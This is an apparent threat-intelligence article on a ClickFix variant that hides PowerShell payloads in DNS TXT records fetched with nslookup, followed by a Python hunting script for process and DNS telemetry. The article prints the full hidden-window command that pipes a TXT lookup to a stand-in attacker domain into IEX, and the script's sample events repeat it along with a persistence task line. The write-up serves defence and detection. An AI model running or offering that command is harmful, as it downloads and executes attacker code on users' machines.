ClickFix Evolution: DNS-Based Malware Staging via nslookup
Microsoft Threat Intelligence has disclosed a sophisticated evolution of the ClickFix social engineering tactic. In this new variant, attackers have moved away from traditional HTTP-based payload delivery, opting instead to use the Domain Name System (DNS) as a lightweight staging and signaling channel. By tricking users into executing a native nslookup command, threat actors can pull malicious PowerShell scripts directly from DNS TXT records, effectively bypassing most web-based security filters.
The Social Engineering Lure: "The Fix is In"
The attack begins with a familiar ClickFix premise: a user encounters a compromised website that displays a simulated error. Common lures include:
- Fake Browser Crashes: A "CrashFix" popup claiming the browser has encountered a fatal error.
- Incomplete CAPTCHAs: A prompt stating that "Verification failed" and that a manual fix in the terminal is required.
- Google Meet/Zoom Glitches: An alert claiming microphone or headset drivers are missing.
The victim is then instructed to press Win + R, paste a command from their clipboard (which was automatically copied by the malicious site), and press Enter. This "self-infection" model remains the hallmark of the ClickFix strategy, turning the user into the initial access vector.
Technical Breakdown: The nslookup Mechanism
In previous versions, the copied command would typically use mshta or PowerShell to reach out to a malicious URL (e.g., https://attacker[.]com/payload.ps1). The new 2026 variant is more evasive.
1. The Initial Command
The command pasted into the Windows Run dialog now looks similar to this:
powershell.exe -W Hidden -C "IEX (nslookup -q=txt payload.attacker-dns[.]com 8.8.8.8 | Select-String -Pattern '\"' | ForEach-Object { $_.ToString().Trim('\"') })"
2. DNS TXT Records as Dead Drops
The nslookup command queries a specific TXT record on a domain controlled by the attacker. DNS TXT records are designed to hold arbitrary text for verification purposes, but here they contain Base64-encoded PowerShell code.
3. Bypassing System Resolvers
Notably, the command often specifies an external DNS server (like Google's 8.8.8.8 or Cloudflare's 1.1.1.1) rather than using the system's default internal resolver. This allows the attacker to reach their infrastructure directly and avoid internal DNS logging or filtering that might block "Newly Registered Domains" (NRDs) at the enterprise level.
Post-Exploitation: Deploying ModeloRAT
Once the PowerShell payload is retrieved from the DNS response and executed in memory, it typically performs a series of environment checks. If the system is identified as high-value (e.g., domain-joined), the script proceeds to download the final payload: ModeloRAT.
ModeloRAT is a Python-based Remote Access Trojan that offers:
- Stealth Execution: Uses pythonw.exe to run without a console window.
- Credential Harvesting: Specifically targets browser wallet extensions and local session tokens.
- Persistence: Installs a scheduled task named "SoftwareProtection" to re-infect the system every five minutes.
Comparison: HTTP vs. DNS Staging
| Feature | Standard ClickFix (HTTP) | New Variant (DNS/nslookup) |
|---|---|---|
| Primary Tool | mshta.exe / curl | nslookup.exe |
| Payload Storage | Remote Web Server | DNS TXT Records |
| Visibility | Visible in Web Proxy logs | Blends with background DNS noise |
| Detection Barrier | URL Reputation / Blocklists | Bypasses URL filtering entirely |
Defense and Mitigation
Security teams should move beyond simple URL blocking to defend against this "Living Off the Web" technique:
- Restrict PowerShell: Implement Constrained Language Mode and monitor for EncodedCommand or IEX (Invoke-Expression) strings in command-line logs.
- DNS Monitoring: Monitor for an unusual volume of TXT record queries or nslookup processes communicating directly with public DNS providers (8.8.8.8, etc.) instead of your internal DNS.
- Endpoint Protection (EDR): Flag any instance of the Windows Run dialog (explorer.exe) spawning powershell.exe or cmd.exe directly.
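As an added example (not Microsoft's detection logic and not any vendor's rule set), the script below turns the three mitigation bullets above, the external-resolver behaviour described under "Bypassing System Resolvers", and the "SoftwareProtection" scheduled task from the ModeloRAT section into hunting rules over Sysmon-style process-creation events and DNS query records. The event field names, the sample events and the `.invalid` domain are constructed for illustration; the only values taken from the page are the public resolver addresses, the command-line strings being matched and the task name.

```python
"""Hunt for the nslookup-based ClickFix pattern in process and DNS telemetry.

Added example for the page above; the dict-shaped events are an assumed,
Sysmon-like layout (parent image, image, command line) rather than a real
product schema, and every sample event below is constructed.
"""
import ipaddress
import re
from collections import Counter

# Query-type switches nslookup accepts for TXT lookups.
TXT_QUERY = re.compile(r"-(?:q|query|querytype|type)=txt", re.IGNORECASE)
# IEX / Invoke-Expression and the common -EncodedCommand abbreviations.
IEX = re.compile(r"\bIEX\b|Invoke-Expression", re.IGNORECASE)
ENCODED = re.compile(r"(?:^|\s)-e(?:c|nc|ncodedcommand)?(?=\s|$)", re.IGNORECASE)
IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
SHELLS = ("powershell.exe", "pwsh.exe", "cmd.exe")


def _basename(path):
    """Last component of a Windows path, lower-cased."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _public_ips(text):
    """IPv4 literals in text that are globally routable (8.8.8.8, 1.1.1.1, ...),
    i.e. not an internal resolver on RFC 1918 space."""
    found = []
    for literal in IPV4.findall(text):
        try:
            if ipaddress.ip_address(literal).is_global:
                found.append(literal)
        except ValueError:
            continue
    return found


def check_process(ev):
    """Return the names of every rule one process-creation event matches."""
    image, parent, cmd = _basename(ev["image"]), _basename(ev["parent"]), ev["cmdline"]
    hits = []
    # DNS Monitoring: a TXT lookup sent straight to a public resolver.
    if (image == "nslookup.exe" or "nslookup" in cmd.lower()) \
            and TXT_QUERY.search(cmd) and _public_ips(cmd):
        hits.append("nslookup_txt_to_public_resolver")
    if image in ("powershell.exe", "pwsh.exe"):
        # The staging pattern itself: IEX wrapped around an nslookup call.
        if IEX.search(cmd) and "nslookup" in cmd.lower():
            hits.append("powershell_iex_from_nslookup")
        # Restrict PowerShell: IEX or EncodedCommand anywhere on the command line.
        if IEX.search(cmd) or ENCODED.search(cmd):
            hits.append("powershell_iex_or_encodedcommand")
    # EDR: Run dialog (explorer.exe) spawning a shell directly.
    if parent == "explorer.exe" and image in SHELLS:
        hits.append("run_dialog_spawned_shell")
    # Persistence described for ModeloRAT: a task called SoftwareProtection.
    if "schtasks" in cmd.lower() and "softwareprotection" in cmd.lower():
        hits.append("scheduled_task_softwareprotection")
    return hits


def analyze(events):
    """Events with at least one rule hit, summarised for a triage queue."""
    return [{"host": ev["host"], "image": _basename(ev["image"]), "rules": hits}
            for ev in events if (hits := check_process(ev))]


def txt_query_bursts(dns_events, threshold=3):
    """Hosts that sent at least `threshold` TXT queries to public resolvers."""
    counts = Counter(ev["host"] for ev in dns_events
                     if ev["qtype"] == "TXT" and ipaddress.ip_address(ev["resolver"]).is_global)
    return {host: n for host, n in counts.items() if n >= threshold}


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_PROCESS_EVENTS = [  # constructed; the domain uses the reserved .invalid TLD
    {"host": "WS01", "parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": 'powershell.exe -W Hidden -C "IEX (nslookup -q=txt txt.example-placeholder.invalid 8.8.8.8 | ...)"'},
    {"host": "WS01", "parent": PS, "image": r"C:\Windows\System32\nslookup.exe",
     "cmdline": "nslookup -q=txt txt.example-placeholder.invalid 8.8.8.8"},
    {"host": "WS02", "parent": r"C:\Windows\System32\services.exe", "image": r"C:\Windows\System32\nslookup.exe",
     "cmdline": "nslookup -q=mx mail.corp.internal 10.0.0.53"},
    {"host": "WS02", "parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe notes.txt"},
    {"host": "WS01", "parent": PS, "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": 'schtasks /create /tn "SoftwareProtection" /sc minute /mo 5 /tr C:\\placeholder\\task.cmd'},
]
SAMPLE_DNS_EVENTS = [  # constructed DNS query records (host, query type, resolver used)
    {"host": "WS01", "qtype": "TXT", "resolver": "8.8.8.8"},
    {"host": "WS01", "qtype": "TXT", "resolver": "8.8.8.8"},
    {"host": "WS01", "qtype": "TXT", "resolver": "1.1.1.1"},
    {"host": "WS02", "qtype": "TXT", "resolver": "10.0.0.53"},
    {"host": "WS02", "qtype": "A", "resolver": "10.0.0.53"},
]

if __name__ == "__main__":
    for finding in analyze(SAMPLE_PROCESS_EVENTS):
        print(finding)
    print("TXT bursts to public resolvers:", txt_query_bursts(SAMPLE_DNS_EVENTS))
```

The explorer.exe to powershell.exe rule on its own also fires whenever a user opens a normal shell from the Start menu, so in practice it is a scoring signal to combine with the IEX or nslookup rules rather than an alert by itself; the TXT burst threshold likewise needs tuning against a baseline, since hosts that legitimately verify SPF or DKIM records will show some TXT traffic, though normally through the internal resolver.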